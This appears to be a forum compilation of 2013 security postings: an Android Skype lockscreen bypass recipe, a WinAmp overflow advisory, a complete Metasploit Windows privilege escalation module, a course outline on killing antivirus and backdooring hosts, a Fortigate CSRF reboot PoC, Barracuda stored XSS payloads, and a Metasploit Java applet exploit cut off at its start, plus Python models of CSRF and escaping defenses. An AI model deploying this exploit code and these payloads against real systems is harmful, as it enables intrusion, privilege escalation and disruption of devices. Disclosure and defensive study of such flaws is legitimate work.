This can be reproduced as follows with 2 Skype accounts, and 2 separate devices to use with Skype. The target phone is presumed to have an Android lockscreen configured and in use, and to be locked during the test.

1. Initiate a Skype call to the target device, which will cause it to wake, ring, and display a prompt on the screen to answer or reject the call
2. Accept the call from the target device using the green answer button on the screen
3. End the call from the initiating device (ie. the device used to call the target phone)
4. The target device will end the call, and should display the lockscreen.
5. Turn off the screen of the target device using the power key, and turn it on again
6. The lockscreen will now be bypassed. It will remain bypassed until the device is rebooted

Similar to (ironically enough): http://arstechnica.com/security/2013/04/crital-app-flaw-bypasses-screen-lock-on-up-to-100-million-android-phones/. Seems that internet based calling apps might well be "unlucky".

Thanks to Emilio López for originally bringing this to my attention
-
It's typical of the Counter-Strike kids, the Metin kids etc. Welcome.
-
Description : WinAmp version 5.63 suffers from a stack-based buffer overflow vulnerability. The application loads the directories in %PROGRAMFILES%\WinAmp\Skins on startup to determine the skins that have been installed and to list them in the application menu point "Skins" and in the Skins Browser. But the application does not properly validate the length of the directory name before passing it as argument to a lstrcpynW call in the library gen_jumpex.dll, which leads to a buffer overflow condition with possible code execution.
Author : Julien Ahrens
Source : WinAmp 5.63 Buffer Overflow ≈ Packet Storm

Code :

Inshell Security Advisory
http://www.inshell.net

1. ADVISORY INFORMATION
-----------------------
Product:        WinAmp
Vendor URL:     www.winamp.com
Type:           Stack-based Buffer Overflow [CWE-121]
Date found:     2013-06-05
Date published: 2013-07-01
CVSSv2 Score:   Bug #1: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
                Bug #2: 3.7 (AV:L/AC:H/Au:N/C:P/I:P/A:P)
CVE:            CVE-2013-4694

2. CREDITS
----------
These vulnerabilities were discovered and researched by Julien Ahrens from Inshell Security.

3. VERSIONS AFFECTED
--------------------
WinAmp v5.63, older versions may be affected too.

4. VULNERABILITY DESCRIPTION (BUG #1)
-------------------------------------
The application loads the directories in %PROGRAMFILES%\WinAmp\Skins on startup to determine the skins that have been installed and to list them in the application menu point "Skins" and in the Skins Browser. But the application does not properly validate the length of the directory name before passing it as argument to a lstrcpynW call in the library gen_jumpex.dll, which leads to a buffer overflow condition with possible code execution.

This flaw is also exploitable via the %APPDATA%\WinAmp\winamp.ini. The application loads the contents on startup, but does not properly validate the length of the string loaded from the "skin" key before passing it as an argument to the same lstrcpynW call in the library gen_jumpex.dll, which leads to the same buffer overflow condition.

An attacker either needs to trick the victim to download and apply an arbitrary skin package in order to exploit the vulnerability or to copy an arbitrary winamp.ini into the %APPDATA%\WinAmp directory.

Successful exploits can allow attackers to execute arbitrary code with the privileges of the user running the application. Failed exploits will result in a denial-of-service condition.

4. VULNERABILITY DESCRIPTION (BUG #2)
-------------------------------------
The application loads the string of the GUI "Search" field from the "WinAmp Library" when entered by a user and after switching to another menu point, but does not properly validate the length of the string before passing it as an argument to a GetDlgItemTextW call in the library ml_local.dll, which leads to a buffer overflow condition with possible code execution.

An attacker needs local access to the client in order to exploit the vulnerability.

Successful exploits can allow attackers to execute arbitrary code with the privileges of the user running the application. Failed exploits will result in a denial-of-service condition.

5. PROOF-OF-CONCEPT (DEBUG) (Bug #1)
------------------------------------
Registers:
EAX 3B3C08EB
ECX 7C80BAFC kernel32.7C80BAFC
EDX 00430010 winamp.00430010
EBX 0000007E
ESP 00C1F290 UNICODE "CCCCCCCCCCCCCCCCCCCCCCCCCCCC"
EBP 00430043 winamp.00430043
ESI 001961E8
EDI 0000060B
EIP 00430060 winamp.00430060
C 0  ES 0023 32bit 0(FFFFFFFF)
P 1  CS 001B 32bit 0(FFFFFFFF)
A 0  SS 0023 32bit 0(FFFFFFFF)
Z 1  DS 0023 32bit 0(FFFFFFFF)
S 0  FS 003B 32bit 7FFDE000(FFF)
T 0  GS 0000 NULL
D 0
O 0  LastErr ERROR_INVALID_WINDOW_HANDLE (00000578)
EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE)
ST0 empty +NaN
ST1 empty
ST2 empty
ST3 empty
ST4 empty
ST5 empty
ST6 empty
ST7 empty
               3 2 1 0      E S P U O Z D I
FST 0120  Cond 0 0 0 1  Err 0 0 1 0 0 0 0 0  (LT)
FCW 027F  Prec NEAR,53  Mask    1 1 1 1 1 1

Stackview:
ESP-20  > 00430043  CC  winamp.00430043
ESP-1C  > 0043004B  KC  winamp.0043004B
ESP-18  > 7C80BAFC      kernel32.7C80BAFC
ESP-14  > 00430043  CC  winamp.00430043
ESP-10  > 00430043  CC  winamp.00430043
ESP-C   > 00430043  CC  winamp.00430043
ESP-8   > 00430043  CC  winamp.00430043
ESP-4   > 00430043  CC  winamp.00430043
ESP ==> > 00430043  CC  winamp.00430043
ESP+4   > 00430043  CC  winamp.00430043
ESP+8   > 00430043  CC  winamp.00430043
ESP+C   > 00430043  CC  winamp.00430043
ESP+10  > 00430043  CC  winamp.00430043
ESP+14  > 00430043  CC  winamp.00430043
ESP+18  > 00430043  CC  winamp.00430043
ESP+1C  > 00430043  CC  winamp.00430043
ESP+20  > 00430043  CC  winamp.00430043

Vulnerable code part:
.text:1001A5B8                 push    eax             ; lpString2
.text:1001A5B9                 lea     eax, [ebp+String1]
.text:1001A5BF                 push    eax             ; lpString1
.text:1001A5C0                 call    ds:lstrcpynW
.text:1001A5C6                 cmp     word ptr [ebp+wParam], si
.text:1001A5CD                 jnz     short loc_1001A5E2
.text:1001A5CF                 mov     dword_100310B4, 1
.text:1001A5D9                 cmp     [ebp+String1], si
.text:1001A5E0                 jz      short loc_1001A5E8
.text:1001A5E2
.text:1001A5E2 loc_1001A5E2:                           ; CODE XREF: sub_1001A551+7Cj
.text:1001A5E2                 mov     dword_100310B4, esi
.text:1001A5E8
.text:1001A5E8 loc_1001A5E8:                           ; CODE XREF: sub_1001A551+8Fj
.text:1001A5E8                 pop     esi
.text:1001A5E9                 leave
.text:1001A5EA                 retn
.text:1001A5EA sub_1001A551    endp

5. PROOF-OF-CONCEPT (DEBUG) (Bug #2)
------------------------------------
Registers:
EAX 00000000
ECX 079A9D68 ml_local.079A9D68
EDX 00380608
EBX 00000000
ESP 00C1E46C UNICODE "CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC"
EBP 00430043 winamp.00430043
ESI 00000000
EDI 00000000
EIP 00430043 winamp.00430043
C 0  ES 0023 32bit 0(FFFFFFFF)
P 1  CS 001B 32bit 0(FFFFFFFF)
A 0  SS 0023 32bit 0(FFFFFFFF)
Z 1  DS 0023 32bit 0(FFFFFFFF)
S 0  FS 003B 32bit 7FFDE000(FFF)
T 0  GS 0000 NULL
D 0
O 0  LastErr ERROR_INVALID_WINDOW_HANDLE (00000578)
EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE)
ST0 empty
ST1 empty
ST2 empty
ST3 empty
ST4 empty
ST5 empty
ST6 empty
ST7 empty
               3 2 1 0      E S P U O Z D I
FST 0000  Cond 0 0 0 0  Err 0 0 0 0 0 0 0 0  (GT)
FCW 027F  Prec NEAR,53  Mask    1 1 1 1 1 1

Stackview:
ESP-20  > 00430043  CC  winamp.00430043
ESP-1C  > 00430043  CC  winamp.00430043
ESP-18  > 00430043  CC  winamp.00430043
ESP-14  > 00430043  CC  winamp.00430043
ESP-10  > 00430043  CC  winamp.00430043
ESP-C   > 00430043  CC  winamp.00430043
ESP-8   > 00430043  CC  winamp.00430043
ESP-4   > 00430043  CC  winamp.00430043
ESP ==> > 00430043  CC  winamp.00430043
ESP+4   > 00430043  CC  winamp.00430043
ESP+8   > 00430043  CC  winamp.00430043
ESP+C   > 00430043  CC  winamp.00430043
ESP+10  > 00430043  CC  winamp.00430043
ESP+14  > 00430043  CC  winamp.00430043
ESP+18  > 00430043  CC  winamp.00430043
ESP+1C  > 00430043  CC  winamp.00430043
ESP+20  > 00430043  CC  winamp.00430043

Vulnerable code part:
.text:07990871                 lea     eax, [ebp+WideCharStr]
.text:07990877                 push    eax             ; lpString
.text:07990878                 push    3EEh            ; nIDDlgItem
.text:0799087D                 push    [ebp+hDlg]      ; hDlg
.text:07990880                 call    ds:GetDlgItemTextW
.text:07990886                 lea     eax, [ebp+WideCharStr]
[...]
.text:0799097C                 mov     dword_79A9D68, eax
.text:07990981                 mov     dword_79A9D70, eax
.text:07990986                 mov     dword_79A9D6C, eax
.text:0799098B                 mov     dword_79ACB54, eax
.text:07990990                 pop     ebx
.text:07990991                 leave
.text:07990992                 retn

6. SOLUTION
-----------
Update to latest version v5.64 or newer.

7. REPORT TIMELINE
------------------
2013-06-05: Discovery of the vulnerability
2013-06-06: Vendor acknowledgement of the issue
2013-06-11: Vendor already fixed this issue in v5.7 Beta build 3403
2013-06-12: Confirmation that the issue is fixed
2013-06-19: Vendor releases v5.64 which includes the fix
2013-07-01: Coordinated Disclosure

8. REFERENCES
-------------
http://security.inshell.net
http://forums.winamp.com/showthread.php?t=364291
-
Description : This Metasploit module exploits a vulnerability on EPATHOBJ::pprFlattenRec due to the usage of uninitialized data which allows to corrupt memory. At the moment, the module has been tested successfully on Windows XP SP3, Windows 2003 SP1, and Windows 7 SP1.
Author : Tavis Ormandy, egypt, sinn3r, juan vazquez, progmboy, Meatballs, Keebie4e
Source : Windows EPATHOBJ::pprFlattenRec Local Privilege Escalation ≈ Packet Storm
Code :

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'
require 'rex'
require 'msf/core/post/common'
require 'msf/core/post/windows/priv'
require 'msf/core/post/windows/process'

class Metasploit3 < Msf::Exploit::Local
  Rank = AverageRanking

  include Msf::Post::File
  include Msf::Post::Windows::Priv
  include Msf::Post::Windows::Process

  def initialize(info={})
    super(update_info(info, {
      'Name'           => 'Windows EPATHOBJ::pprFlattenRec Local Privilege Escalation',
      'Description'    => %q{
        This module exploits a vulnerability on EPATHOBJ::pprFlattenRec due to the usage of
        uninitialized data which allows to corrupt memory. At the moment, the module has been
        tested successfully on Windows XP SP3, Windows 2003 SP1, and Windows 7 SP1.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Tavis Ormandy <taviso[at]cmpxchg8b.com>', # Vulnerability discovery and Original Exploit
          'progmboy <programmeboy[at]gmail.com>',    # Original Exploit
          'Keebie4e',                                # Metasploit integration
          'egypt',                                   # Metasploit integration
          'sinn3r',                                  # Metasploit integration
          'Meatballs',                               # Metasploit integration
          'juan vazquez'                             # Metasploit integration
        ],
      'Arch'           => ARCH_X86,
      'Platform'       => 'win',
      'SessionTypes'   => [ 'meterpreter' ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Targets'        =>
        [
          [ 'Automatic', { } ]
        ],
      'Payload'        =>
        {
          'Space'       => 4096,
          'DisableNops' => true
        },
      'References'     =>
        [
          [ 'CVE', '2013-3660' ],
          [ 'EDB', '25912' ],
          [ 'OSVDB', '93539' ],
          [ 'URL', 'http://seclists.org/fulldisclosure/2013/May/91' ],
        ],
      'DisclosureDate' => 'May 15 2013',
      'DefaultTarget'  => 0
    }))
  end

  def check
    os = sysinfo["OS"]
    if os =~ /windows/i
      return Exploit::CheckCode::Vulnerable
    end
  end

  def exploit
    if sysinfo["Architecture"] =~ /wow64/i
      fail_with(Exploit::Failure::NoTarget, "Running against WOW64 is not supported")
    elsif sysinfo["Architecture"] =~ /x64/
      fail_with(Exploit::Failure::NoTarget, "Running against 64-bit systems is not supported")
    end

    print_status("Creating a new process and migrating...")
    cmd = "#{expand_path("%windir%")}\\System32\\notepad.exe"
    new_proc = session.sys.process.execute(cmd, nil, {'Hidden' => true })
    new_pid = new_proc.pid

    if not new_pid
      print_error("Failed to create the new process, trying in the current one, if unsuccessful migrate by yourself")
    else
      print_status("Migrating to #{new_pid}")
      migrate_res = false
      begin
        migrate_res = session.core.migrate(new_pid)
      rescue ::RuntimeError, ::Rex::Post::Meterpreter::RequestError
        migrate_res = false
      end

      if migrate_res
        print_good("Successfully migrated to process #{new_pid}")
      else
        print_warning("Unable to migrate to process #{new_pid.to_s}, trying current #{session.sys.process.getpid} instead. If still unsuccessful, please migrate manually")
      end
    end

    print_status("Trying to load the exploit and executing...")
    session.core.load_library({
      "LibraryFilePath" => File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-3660", "exploit.dll"),
      "UploadLibrary"   => true,
      "Extension"       => false,
      "TargetFilePath"  => "#{rand_text_alpha(5 + rand(3))}.dll",
      "SaveToDisk"      => false
    })

    print_status("Checking privileges after exploitation...")
    if is_system?
      print_good("Exploitation successful!")
    else
      fail_with(Exploit::Failure::Unknown, "The exploitation wasn't successful but should be safe to try again")
    end

    if execute_shellcode(payload.encoded)
      print_good("Enjoy!")
    else
      fail_with(Exploit::Failure::Unknown, "Error while executing the payload")
    end
  end

end
-
Description : This is the course material for the SMFE Certification
Author : SecurityTube_Bot
Source : Security Metasploit Framework Expert

Securitytube Metasploit Framework Expert Part 1 : Exploits Basics
In this video, we will look at the basics of vulnerability, how to use a raw one using the exploit source code and identify the problems with this approach. This will then lead to the need for a tool like Metasploit.

Securitytube Metasploit Framework Expert Part 2 : Why Metasploit ?
In Part 2, we will look at how to use Metasploit to exploit vulnerabilities in the Dcom and Netapi services. We will also learn how to de-couple exploits and payloads, and mix and match them.

Securitytube Metasploit Framework Expert Part 3 : Meterpreter Basics
In this video, we will look at the basics of Meterpreter - how it uses reflective DLL injection to stay in-memory, communicates over encrypted channels, uses TLV for communication which allows for multi-channel communication and a bunch of other things.

Securitytube Metasploit Framework Expert : Armitage
This video, part of the SecurityTube Metasploit Framework Expert series, introduces Armitage. You'll learn the basic use of Armitage and see a demonstration. This video also covers some of the advanced features: dynamic workspaces, team collaboration, and reporting.

Securitytube Metasploit Framework Expert Part 4 : Framework Organization
In this video, we will look at the organization of the Metasploit framework, the different directories, what they contain and finally a deeper look into the different kinds of payloads - Singles, Stagers and Stages.

Securitytube Metasploit Framework Expert Part 5 : Post-Exploitation Kung-Fu
In this video, we will look at how to use Meterpreter in the post exploitation phase to dig deeper into the victim computer - configurations, users, idle time, are we in a virtual environment?, enumerating Windows configurations etc.

Securitytube Metasploit Framework Expert Part 6 : Post Exploitation Privilege Escalation
In this video, we will look at privilege escalation in the post exploitation phase using Metasploit. It's a short, sweet video on using the system meterpreter script along with other things.

Securitytube Metasploit Framework Expert Part 7 : KILLING AV AND DISABLING FIREWALL
In this video, we will look at how to disable the Windows firewall and kill the AV after breaking in. The interesting thing to note is that the default script to kill AV in meterpreter, which is "Killav", fails with almost all of the latest AVs because it uses a simple exe image name search and tries to kill the processes. However, as most of the AV manufacturers run a watchdog service which is typically unstoppable, this service restarts the AV processes again. We will learn how to find the services which are running on the system, locate the AV services, change their configurations from the command line and then see how to kill them. Most of this video has little to do with Metasploit and more to do with how to "do a custom kill". After all, one cannot be as good as the tools he uses. Tools are an aid, not a crutch.

Securitytube Metasploit Framework Expert Part 8 : Stdapi And Priv Extensions
In this video, we will understand more about Windows sessions, desktops - both interactive and non-interactive, and the essential role they play in getting things done during post exploitation. What we will see is that unless we are associated with the WinSta0 desktops - Default for current user sessions, Winlogon for Login screen and Disconnect for password protected screensavers, we will not be able to successfully do things like log keystrokes or play with UI interaction. This is a must watch and may answer a lot of questions you may have, especially if you've had things like the key logger script fail on you in post exploitation!

Securitytube Metasploit Framework Expert Part 9 : Token Stealing And Incognito
In this video, we will look at what Windows tokens are and how a hacker can steal tokens to impersonate the identity of another user on either the local machine or network wide. We will explore the incognito extension to understand how to steal and use tokens on a compromised box in the post exploitation phase. This is a very important concept, so please pay attention.

Securitytube Metasploit Framework Expert Part 10 : Espia And Sniffer Extensions In Post Exploitation
In this video, we will look at the Espia and Sniffer extensions and how to use them to grab remote screenshots and to run a sniffer on one or multiple interfaces on the victim computer. The Sniffer extension allows for the export of the captured packets in a pcap file, which can be transported back to the attacker's machine. This extension can come in really handy to understand the local network in the victim's environment, not to mention the possibility of being able to sniff any credentials which may be sent out or received by the victim in plain text.

Securitytube Metasploit Framework Expert Part 11 : Post Exploitation Backdoors
In this video, we will look at how to backdoor exploited systems using Metasploit. After all, you have taken all the pains to break in; you might as well retain access for a cool demo to the client later on. We will look at the two popular ways to backdoor with Metasploit - Persistence and Metsvc. We will also look at where to find 3rd party backdoors and rootkits.

Securitytube Metasploit Framework Expert Part 12 : Pivoting After Post Exploitation
In this video, we will learn an interesting technique on how to break deeper into a network, using the first machine we compromise in the network. The idea is to "pivot" around the first host and then break further in. The idea is that Metasploit will do all the hard work for you and proxy all the connections via the meterpreter session on the first compromised host to the rest of the internal network of the victim machine. Pivoting is probably one of the most important concepts in penetration testing and most of the "real world hacking" relies on this.

Securitytube Metasploit Framework Expert Part 13 : Port Forwarding As Part Of Post Exploitation
In this video, we will look at how to use a compromised host to port forward the attacker traffic to internal hosts in the victim's network. This trick comes in extremely handy when the attacker needs to access internal applications and services on the victim's network which are not accessible via the public IP addresses. We will see how in this case, the attacker is able to access an internal web based file sharing service used by the employees of a company.

Securitytube Metasploit Framework Expert Part 14 : Client Side Exploits
In this video, we will look at how to use a compromised host to port forward the attacker traffic to internal hosts in the victim's network. This trick comes in extremely handy when the attacker needs to access internal applications and services on the victim's network which are not accessible via the public IP addresses. We will see how in this case, the attacker is able to access an internal web based file sharing service used by the employees of a company.

Securitytube Metasploit Framework Expert Part 15 : Backdoors And Rootkits In Post Exploitation
In this video, we will look at how to backdoor executables with Metasploit. The idea is to use Msfpayload and Msfencode (or Msfvenom, which is a combination of both the tools) to take an existing executable and add a payload which Metasploit supports. In the most typical case, we will take a common executable like notepad.exe and then integrate our payload with it. We have 2 choices - use the executable template but only make the payload run, or make both the original executable and the payload run. We will discuss both of these cases in this video. We will also take a quick glance at AV Evasion using a polymorphic encoder which ships with Metasploit along with how to use upx.exe to pack it. Please note that AV evasion is a topic in itself and in this course, we will restrict ourselves to what we can accomplish with Metasploit.

Securitytube Metasploit Framework Expert Part 16 : Exploit Research With Metasploit
In this video, we will go through the basics of Exploit Research and take up an example from the Exploit Research Megaprimer ( ) to illustrate how to use msfvenom, pattern_create and pattern_offset to analyze vulnerabilities and create working exploit code for them. This is a must watch if you plan to use Metasploit for Exploit Research.

Securitytube Metasploit Framework Expert Part 17 : Railgun Basics
In this video, we will look at an interesting extension called Railgun which allows the attacker to run arbitrary code from DLLs on the victim system. We will have multiple videos on Railgun - in this video we will look at some of the basic functionality of railgun and see how we can use this. Pay close attention to this, as this is a powerful weapon in your hacking arsenal.

Securitytube Metasploit Framework Expert Part 18 : Railgun Adding Functions
In this video, we will look at how to dynamically add functions to DLLs either at runtime or define them statically in the definition files in Metasploit. This is really important for anyone who wants to extend the functionality of Railgun and use it for advanced pentesting.

Securitytube Metasploit Framework Expert Part 19 : Railgun Adding New Dlls
This is the final video on Railgun in which we learn how to add new custom DLL support either on the fly or create a new DLL definition file for it. This technique allows us to leverage existing DLLs on the remote system and also upload and run code from our custom DLLs. This gives us a lot of power!

Securitytube Metasploit Framework Expert Part 19a : Railgun Adding New Dlls On Windows 7
In Part 19, we had demonstrated how to add a new DLL "mpr.dll" at either runtime or in advance to Railgun. In this video, we will quickly do the exact same demo on the Windows 7 Professional platform. This is just to demonstrate that even though a majority of the demonstrations were on Windows XP, the principles remain the same.

Securitytube Metasploit Framework Expert Part 20 : Resource Scripts
In this video, we will learn how to automate tasks in Metasploit using resource scripts - either at startup time or runtime. Resource scripts can really take the pain away of manually having to type in the same set of commands every time.

Securitytube Metasploit Framework Expert Part 21 : Database Support
In this video, we will look at how to tap into the database support offered by Metasploit to store persistent results of the penetration tests we conduct. We will look at the concepts of workspaces, hosts, services, vuln tables etc. in the course of this video.

Securitytube Metasploit Framework Expert Part 22 : Using Plugins
In this video, we will look at how to use plugins in Metasploit to leverage 3rd party tools.

Securitytube Metasploit Framework Expert Part 23 : Meterpreter Api Basics
In this video, we will explore how to unearth the Meterpreter API from the framework code base and start using it. We will see how to run the calls from the irb mode while in a post exploitation meterpreter session. This video will lay the foundation for creating meterpreter scripts.

Securitytube Metasploit Framework Expert Part 24 : Meterpreter Scripting Migrate Clone
In this video, we will look at how to create a Meterpreter script to migrate from one process to the other, using our newfound knowledge of the Meterpreter API.

Securitytube Metasploit Framework Expert Part 25 : Meterpreter Scripting Process Name Search
In this video, we will explore how to find the right APIs to dig deep into processes running on the victim system and search for a particular process by name.
-
Author : Sven Wurth
Source : Fortigate Firewalls - CSRF Vulnerability
Code :

Vulnerability ID: CVE-2013-1414
Vulnerability Type: CSRF (Cross-Site Request Forgery)
Product: All Fortigate Firewalls
Vendor: Fortinet http://www.fortinet.com
Vulnerable Version: < 4.3.13 & < 5.0.2

Description
==========
Because many functions are not protected by CSRF tokens, it's possible (under certain conditions) to modify system settings, firewall policies or take control over the whole firewall.

Requirements
===========
An attacker needs to know the IP of the device.
An administrator needs an authenticated connection to the device.

Report-Timeline:
================
Vendor Notification: 11 July 2012
Vendor released version 5.0.2 / 18 March 2013
Vendor released version 4.3.13 / 29 April 2013
Status: Fixed

Google Dork:
==========
-english -help -printing -companies -archive -wizard -pastebin -adult -keywords "Warning: this page requires Javascript. To correctly view, please enable it in your browser"

Credit:
=====
Sven Wurth dos@net-war.de

PoC
====
This example will reboot a Fortinet firewall. This is just one of many possibilities to attack this vulnerability.

##### CSRF - Proof Of Concept ####
<html>
<body onload="submitForm()">
<form name="myForm" id="myForm" action="https://###_VICTIM_IP_###/system/maintenance/shutdown" method="post">
<input type="hidden" name="reason" value="">
<input type="hidden" name="action" value="1">
<input type="submit" name="add" value="rebootme">
</form>
<script type='text/javascript'>document.myForm.submit();</script>
</html>
##### End Poc #####
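The fix for the class of bug above is a per-session synchronizer token that the forged form cannot know. The following Python model is added here as an illustration and is not Fortinet code; the management origin, the Session/Request classes and the csrf_token field name are assumptions, while the endpoint path and form fields (reason, action, add) are taken from the PoC.

```python
import hmac
import secrets
from dataclasses import dataclass, field
from typing import Dict, Optional

# Hypothetical management-interface origin; the advisory only gives ###_VICTIM_IP_###.
MGMT_ORIGIN = "https://firewall.example"
SHUTDOWN_PATH = "/system/maintenance/shutdown"  # endpoint targeted by the PoC form


@dataclass
class Session:
    """Server-side session of a logged-in administrator (constructed model)."""
    admin: str
    csrf_token: str = field(default_factory=lambda: secrets.token_hex(16))


@dataclass
class Request:
    """Only the parts of an HTTP request the check needs (constructed model)."""
    method: str
    path: str
    form: Dict[str, str]
    origin: Optional[str] = None  # Origin header; None when the client sent none


def is_same_origin(req: Request) -> bool:
    # Defence in depth: when a browser does send Origin, it must be our own.
    # A missing Origin is tolerated so non-browser API clients keep working.
    return req.origin is None or req.origin == MGMT_ORIGIN


def has_valid_csrf_token(req: Request, session: Session) -> bool:
    # Synchronizer token: the form must carry this session's token. The
    # attacker's page cannot read it, so the PoC's POST can never satisfy this.
    token = req.form.get("csrf_token", "")
    return bool(token) and hmac.compare_digest(token, session.csrf_token)


def handle_shutdown(req: Request, session: Session) -> int:
    """Return an HTTP status: 403 for a forged request, 200 when the reboot may proceed."""
    if req.path != SHUTDOWN_PATH:
        return 404
    if req.method != "POST":
        return 405  # state-changing action only via POST
    if not is_same_origin(req) or not has_valid_csrf_token(req, session):
        return 403
    if req.form.get("action") != "1":
        return 400
    return 200  # the appliance would reboot at this point


def poc_request() -> Request:
    """The POST the advisory's hidden form submits: reason, action=1, add=rebootme, no token."""
    return Request("POST", SHUTDOWN_PATH,
                   {"reason": "", "action": "1", "add": "rebootme"},
                   origin="https://attacker.example")


def legitimate_request(session: Session) -> Request:
    """The same POST as issued by the real management UI, carrying the session token."""
    return Request("POST", SHUTDOWN_PATH,
                   {"reason": "", "action": "1", "csrf_token": session.csrf_token},
                   origin=MGMT_ORIGIN)


if __name__ == "__main__":
    s = Session("admin")
    print("forged PoC request ->", handle_shutdown(poc_request(), s))        # 403
    print("management UI request ->", handle_shutdown(legitimate_request(s), s))  # 200
```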
-
Author : LiquidWorm
Source : Barracuda SSL VPN 680Vx 2.3.3.193 - Multiple Script Injection Vulnerabilities
Code :

Barracuda SSL VPN 680Vx 2.3.3.193 Multiple Script Injection Vulnerabilities

Vendor: Barracuda Networks, Inc.
Product web page: https://www.barracuda.com
Affected version: 2.3.3.193, Model: V680

Summary: The Barracuda SSL VPN is a powerful plug-and-play appliance purpose-built to provide remote users with secure access to internal network resources.

Desc: Barracuda SSL VPN suffers from multiple stored XSS vulnerabilities when parsing user input to several parameters via POST method. Attackers can exploit these weaknesses to execute arbitrary HTML and script code in a user's browser session.

Tested on: Linux 2.4.x, Jetty Web Server

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience

Vendor status:
[05.03.2013] Vulnerabilities discovered.
[16.03.2013] Contact with the vendor.
[17.03.2013] Vendor replies.
[19.03.2013] Working with the vendor.
[28.03.2013] Vendor confirms issues, track BNSEC-1239.
[15.04.2013] Asked vendor for status update.
[17.04.2013] Vendor replies.
[18.04.2013] Confirming that the issues are still present on the demo test sites. (v2.3.3.193)
[07.05.2013] Vendor informs that the version 2.3.3.216 since 13.03.2013 is patched from these issues.
[08.05.2013] Coordinating with the vendor.
[08.06.2013] Vendor confirms that as of firmware version 2.3.3.216 the issues have been resolved.
[01.07.2013] Coordinated public security advisory released.

Advisory ID: ZSL-2013-5147
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5147.php

Barracuda Labs:
http://barracudalabs.com/?page_id=3456
http://barracudalabs.com/?page_id=3458

05.03.2013

--

====================================================================================
https://server/showSystemConfiguration.do?categoryId=821
CRLs ADD: "><script>alert(1);</script>
Parameter: propertyItem[25].value
====================================================================================
https://server/showAuditReports.do (Reports)
Username ADD: "><script>alert(1);</script>
Parameters: user account
====================================================================================
https://server/showSystemConfiguration.do?categoryId=14800
Files to Scan ADD: "><script>alert(1);</script>
Files to Exclude from Scanning ADD: "><script>alert(2);</script>
Files to Block ADD: "><script>alert(3);</script>
Parameters: propertyItem[1].value propertyItem[2].value propertyItem[3].value
====================================================================================
https://server/showSystemConfiguration.do?categoryId=810
Public Internal Web Sites ADD: "><script>alert(1);</script>
VPN Port ADD: "><script>alert(2);</script>
Parameters: propertyItem[1].value propertyItem[8].value
====================================================================================
https://server/showAvailableAccounts.do
Available Groups ADD: "><script>alert(1);</script>
Parameter: selectedRoles
====================================================================================
https://server/editMessage.do?actionTarget=sendMessageToUser&resourceName=user&realm=1&parent_name=edit
Account ADD: "><script>alert(1);</script>
Group ADD: "><script>alert(2);</script>
Policy ADD: "><script>alert(3);</script>
Parameter: policy
====================================================================================
https://server/editAccount.do?actionTarget=edit&username=guest&parent_name=edit
Available Groups ADD: "><script>alert(1);</script>
Authorized IP Addresses ADD: "><script>alert(2);</script>
Other Computers (Wake-On-LAN) ADD: "><script>alert(3);</script>
Parameters: selectedRoles propertyItem[1].value propertyItem[6].value
====================================================================================
https://server/editMessage.do?actionTarget=sendMessageToRole&resourceName=%22onmouseover=prompt%28%22XSS3%22%29%3E%0A%0DB&realm=9999&parent_name=edit
https://server/editMessage.do?actionTarget=sendMessageToRole&resourceName=CLICK%20ME%20PLEASE%20!!!%20ZOMG%20XSS%20INVISIBLE%20%22onmouseover=prompt%28document.location=%27http://zeroscience.mk%27%29%3E&realm=9999&parent_name=edit
Group ADD: "><script>alert(1);</script>
Parameter: resourceName
====================================================================================
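Every payload above first closes the attribute it is stored in with a double quote; the resourceName variant then injects an onmouseover attribute rather than a new element, so stripping angle brackets alone would not stop it. The Python below is added here as an illustration and is not Barracuda code; the propertyItem[1].value template is assumed, while the three payloads are copied from the advisory.

```python
import html
import re
from urllib.parse import unquote

# Payloads from the advisory; the last one is the URL-encoded resourceName
# value decoded the way the server would see it.
ADVISORY_PAYLOADS = [
    '"><script>alert(1);</script>',
    '"><script>alert(2);</script>',
    unquote('%22onmouseover=prompt%28%22XSS3%22%29%3E%0A%0DB'),
]

# Assumed settings-form field that echoes a stored value back into an attribute.
TEMPLATE = '<input type="text" name="propertyItem[1].value" value="{}">'


def render_naive(value: str) -> str:
    # The flaw class in the advisory: stored input written back into an
    # attribute of the configuration form without any encoding.
    return TEMPLATE.format(value)


def render_angle_brackets_only(value: str) -> str:
    # A common half fix: neutralise < and > but leave quotes alone.
    return TEMPLATE.format(value.replace("<", "&lt;").replace(">", "&gt;"))


def render_hardened(value: str) -> str:
    # Attribute context needs &, <, >, " and ' encoded; quote=True covers all five.
    return TEMPLATE.format(html.escape(value, quote=True))


_VALUE_ATTR = re.compile(r'value="([^"]*)"')


def attribute_intact(markup: str) -> bool:
    """True when the value attribute is the last token of the tag, i.e. the stored
    string did not terminate the attribute early and smuggle in extra attributes
    (onmouseover=...) or elements (<script>) after it."""
    m = _VALUE_ATTR.search(markup)
    return m is not None and markup[m.end():] == ">"


def audit(value: str) -> dict:
    """Per-renderer verdict for one stored value; used to compare the three renderers."""
    return {
        "naive": attribute_intact(render_naive(value)),
        "angle_only": attribute_intact(render_angle_brackets_only(value)),
        "hardened": attribute_intact(render_hardened(value)),
    }


if __name__ == "__main__":
    for p in ADVISORY_PAYLOADS:
        print(repr(p), "->", audit(p))
```

The angle-bracket filter still reports the attribute as broken for the resourceName payload because the leading quote ends the value and the text that follows becomes a live event handler.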
-
Author : metasploit
Source : Java Applet ProviderSkeleton Insecure Invoke Method
Code :

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'
require 'rex'

class Metasploit3 < Msf::Exploit::Remote
  Rank = GreatRanking # Because there isn't click2play bypass, plus now Java Security Level High by default

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE
  include Msf::Exploit::Remote::BrowserAutopwn
  autopwn_info({ :javascript => false })

  EXPLOIT_STRING = "Exploit"

  def initialize( info = {} )
